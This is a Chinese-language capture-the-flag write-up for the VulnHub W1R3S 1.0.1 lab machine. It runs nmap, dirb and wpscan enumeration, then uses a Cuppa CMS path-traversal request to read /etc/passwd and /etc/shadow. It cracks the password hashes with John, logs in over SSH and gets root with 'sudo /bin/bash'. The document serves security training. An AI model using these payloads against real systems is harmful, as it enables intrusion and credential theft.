w1r3s-101打靶思路详解(vulnhub)

w1r3s-101打靶思路详解(vulnhub)

第一步:信息收集–主机发现和端口扫描

使用nmap快速对局域网进行扫描来确定靶机IP

nmap -sn 192.168.31.0/24 

确定靶机IP为192.168.31.105

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.105

结果如下

在这里插入图片描述

发现开放了21,22,80,3306端口

第二步:WEB渗透

访问http://192.168.31.105/

在这里插入图片描述

发现是apache的初始界面

使用dirb扫描目录

dirb http://192.168.31.105/

发现结果非常多,那就写入dirb文件中,然后使用python匹配一下

dirb http://192.168.31.105/ > dirb

在这里插入图片描述

分别访问可以发现有cuppa和wordpress这两个cms组成

wordpress 直接用wpscan扫描一下

wpscan --url http://192.168.31.105/wordpress/index.php

cuppa 用searchsploit搜索一下

searchsploit cuppa 

查看

searchsploit -p  25971 

在这里插入图片描述

根据结果访问https://www.exploit-db.com/exploits/25971

在这里插入图片描述

可以看到漏洞出现的位置,关键代码以及exp

使用我们直接利用访问http://192.168.31.105/administrator/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd

在这里插入图片描述

那换成POST请求

在这里插入图片描述

可以了,然后读取/etc/shadow

在这里插入图片描述

然后将有hash值的用户列写入password.txt

在这里插入图片描述

第三步:后渗透

使用John进行爆破密码

john password.txt 

然后查看

john password.txt --show

在这里插入图片描述

使用ssh登入

ssh w1r3s@192.168.31.105

在这里插入图片描述

然后查看权限

sudo -l

在这里插入图片描述

发现是全部权限

接下来就简单了

sudo /bin/bash

然后就读取flag了

在这里插入图片描述

至此完结,撒花。

  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值